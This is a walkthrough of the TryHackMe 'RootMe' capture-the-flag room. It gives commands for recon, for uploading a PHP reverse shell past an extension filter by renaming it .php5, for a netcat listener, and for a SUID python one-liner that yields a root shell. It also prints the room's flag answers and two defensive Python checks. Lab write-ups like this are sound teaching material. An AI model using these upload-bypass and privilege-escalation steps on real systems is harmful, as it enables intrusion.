RootMe Capture the Flag walk through

RootMe is a vulnerable machine created by reddyyZ as a TryHackMe practice room. It is meant to test skills such as nmap, GoBuster, privilege escalation, SUID files, web shells and GTFOBins.

You can access it by clicking the link below:

RootMe on TryHackMe Official Website

In order to solve this easy room, there are some requirements and tasks to complete. Let's have a look at them!


Tasks

Task 1: Deploy the Machine

A very simple task. In this first one we just need to start the machine so that we can reach it through its IP (Internet Protocol) address.

Task 2: Reconnaissance

Here is where the hacking really begins! Now we have some more questions to answer before we can move on to the next task.

To answer these questions properly, we'll use nmap and GoBuster.

Task 3: Getting a Shell

Now we need to find a way to upload an exploit and get a reverse shell running on the target system. Then we'll explore it and look for a flag on the system.

To find a way into the system, we need to analyze all the resources we have, then start testing them and look for vulnerable places to attack.

Task 4: Privilege Escalation

Now that we have a shell, we need to find a way to become root. To do that, we are going to look for SUID files and try to find anything out of place.


Steps

  1. Scan the machine using nmap:
  2. Type: nmap -sC -sV <IP_Address>

  3. -sC runs nmap's default scripts against the ports it finds.

  4. -sV probes the open ports to identify the service and version running on each of them.
nmap's scan result

Now the first three questions can be answered properly:

  • How many ports are open?
    • 2
  • What version of Apache is running?
    • 2.4.29
  • What service is running on port 22?
    • SSH
  1. Run GoBuster to look for files and directories on the web server.
  2. Type: gobuster dir -u http://<IP_Address> -w <wordlist>.txt

  3. dir puts gobuster in directory/file brute-force mode.
  4. -u passes the target URL.
  5. -w specifies the wordlist to use.
GoBuster result

Based on the result above, one important question can be answered.

  • What is the hidden directory?
    • /panel/
  1. Visit the hidden directory that we just found
  2. Always remember to use the web server IP address or URL.

Secret page

Looks like the hidden directory lets us upload a file to the web server. We can take advantage of this and try to upload a malicious file.

  1. Now we need to upload a web shell in order to get a reverse shell running on the target system.
  2. If you are using Kali Linux, it comes with all the tools we need to solve the CTF, including a PHP reverse shell. To access it, navigate to /usr/share/webshells/php
    and look for php-reverse-shell.php.

    Otherwise, you can download it here

    Now that we have everything we need, it's time to change the values in the PHP script so that the target can connect back to us. To do that, just edit the values shown below. (You can use gedit or nano for it.)

Editing the php script
Edit the IP and PORT variables
  1. Now, go back to the website and upload the PHP script to the server.
  2. You should get an error! No worries, this is a file upload restriction that blocks files that could compromise the server. To bypass this particular restriction, change the file extension to php5.
    Note that there are other types of file upload restrictions, and most of the time a simple extension change will not be enough.

Hidden page error

You can check the files on the server by accessing <IP_Address>/uploads/

Uploads page
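The extension trick above works because the panel filters by a denylist. As an added example (not code from the room or the original walkthrough), the weak denylist check is shown next to a hardened allowlist version; the sample file contents and the image-only allowlist are constructed assumptions for the demo.

```python
import os
import secrets

# Constructed sample inputs for the demo; these are not files from the room.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8
JPEG_SAMPLE = b"\xff\xd8\xff\xe0" + b"\x00" * 8
PHP_SAMPLE = b"<?php echo 'constructed sample'; ?>"

# Denylist, as the /panel/ upload form appears to behave: only ".php" is blocked.
BLOCKED = {".php"}
# Allowlist for the hardened version (assumption: the form only needs images).
ALLOWED = {".png", ".jpg", ".jpeg", ".gif"}
# Leading bytes each allowed type must start with.
MAGIC = {".png": b"\x89PNG\r\n\x1a\n", ".jpg": b"\xff\xd8\xff",
         ".jpeg": b"\xff\xd8\xff", ".gif": b"GIF8"}


def weak_filter_allows(filename: str) -> bool:
    """Denylist check: rejects '.php' but lets '.php5', '.phtml', ... through."""
    return os.path.splitext(filename)[1].lower() not in BLOCKED


def hardened_filter(filename: str, content: bytes):
    """Allowlist plus content check. Returns a server-chosen storage name
    (random, with the allowed extension) or None if the upload is rejected.
    The user-supplied name is never used on disk, so names such as
    'shell.php.jpg' or names with path components never reach the server."""
    base = os.path.basename(filename)
    if base != filename or not base or base.startswith("."):
        return None                       # path traversal or dotfile attempt
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED:
        return None                       # .php5, .phtml, .phar etc. all rejected
    if not content.startswith(MAGIC[ext]):
        return None                       # extension says image, bytes do not
    return secrets.token_hex(8) + ext     # original name discarded
```

A polyglot file (a valid image header with PHP appended) still passes this content check, so the uploads directory must additionally have script execution disabled in the web server configuration.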
  1. Now that we have the reverse shell on the target machine, we just need to start a netcat listener on the port that we configured earlier.
  2. Type: sudo nc -lvnp 9999

NetCat Listener

With netcat running, we just need to execute the PHP script on the target machine. To do that, we need to request its location on the web server.

One way of doing so is to use the curl tool and make an HTTP request to the page. Just type: curl http://<IP_Address>/uploads/reverse-shell.php5

Http request using curl
  1. Go back and check if we got a connection on the listener.
Getting a shell
Yup! We got a shell!
  1. In order to answer the next question, we need to explore the system looking for a file named user.txt. To do that, we can use the Linux find tool.
  2. Type: find / -type f -name user.txt 2> /dev/null

    • -type f restricts the search to regular files.
    • -name passes the filename to look for.
    • 2> /dev/null redirects error messages (such as "Permission denied") to /dev/null so they don't clutter the output.
Using Find
  1. Retrieve the content of user.txt.
  2. Type: cat /var/www/user.txt
    Now we can answer one more question:

  • What is user.txt?
    • THM{y0u_g0t_a_sh3ll}
  1. To solve the next task, we need to find files with SUID permissions that look out of place and check whether any of them can be abused to escalate our privileges.
  2. To do this, type: find / -type f -user root -perm -u=s 2> /dev/null

SUID search
The blurred path is the one out of place

Now we can answer one more question:

  • Which file from the SUID list is weird?
    • /usr/bin/python
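A defender's version of this SUID check, as an added example that is not part of the original walkthrough: it takes the output of the find command above, compares it with a baseline of expected root-owned SUID files (assumed to come from a clean install of the same image; the sample output and the baseline here are constructed subsets) and separately flags interpreters such as python, which should never carry the SUID bit.

```python
import os
import stat

# Constructed `find / -type f -user root -perm -u=s` output for the demo; the
# real list from the room is longer and appears in the screenshot above.
SAMPLE_FIND_OUTPUT = """\
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/python
/usr/lib/openssh/ssh-keysign
/bin/ping
/bin/su
"""

# Baseline of root-owned SUID files expected on a stock install (assumption:
# recorded from a clean reference box of the same image; short subset here).
BASELINE = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/newgrp",
    "/usr/lib/openssh/ssh-keysign", "/bin/ping", "/bin/su",
}

# Program names that should never be SUID root: interpreters, shells and
# editors can run arbitrary commands while keeping the effective uid.
INTERPRETER_NAMES = {"python", "perl", "ruby", "php", "node", "lua",
                     "bash", "sh", "vim", "vi", "find", "awk", "env"}


def audit_suid_list(find_output: str, baseline: set) -> dict:
    """Split a SUID listing into paths the baseline does not expect and the
    subset that is an interpreter (the immediate root risk). Both sorted."""
    paths = [ln.strip() for ln in find_output.splitlines() if ln.strip()]
    unexpected = sorted(p for p in paths if p not in baseline)

    def core_name(p):
        # Strip version suffixes so /usr/bin/python3.6 is matched as "python".
        return os.path.basename(p).rstrip("0123456789.")

    interpreters = sorted(p for p in paths if core_name(p) in INTERPRETER_NAMES)
    return {"unexpected": unexpected, "interpreters": interpreters}


def is_suid(path: str) -> bool:
    """Live check of a single file: owned by root and setuid bit set."""
    st = os.stat(path)
    return st.st_uid == 0 and bool(st.st_mode & stat.S_ISUID)
```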
  1. We just found a serious weakness on the target machine. In order to exploit it, we can look up the specific binary on the GTFOBins website.
SUID Binary in GTFOBins' site
  1. Now that we have everything we need to escalate our privileges, just execute the following command with the SUID binary found above to get the root shell.
  2. Type: python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

Getting super user privileges
Now we're root!
  1. To find the root flag, we need to use the find command again.
  2. Type: find / -type f -name root.txt

Super user flag location
root flag location
  1. Retrieve content of root.txt using the cat command.
  2. Type: cat /root/root.txt

Super user flag
root flag!

And now, finally, we can answer the final question:

  • What's the flag from the root.txt file?
    • THM{pri1v1l3g3_3sc4l4t10n}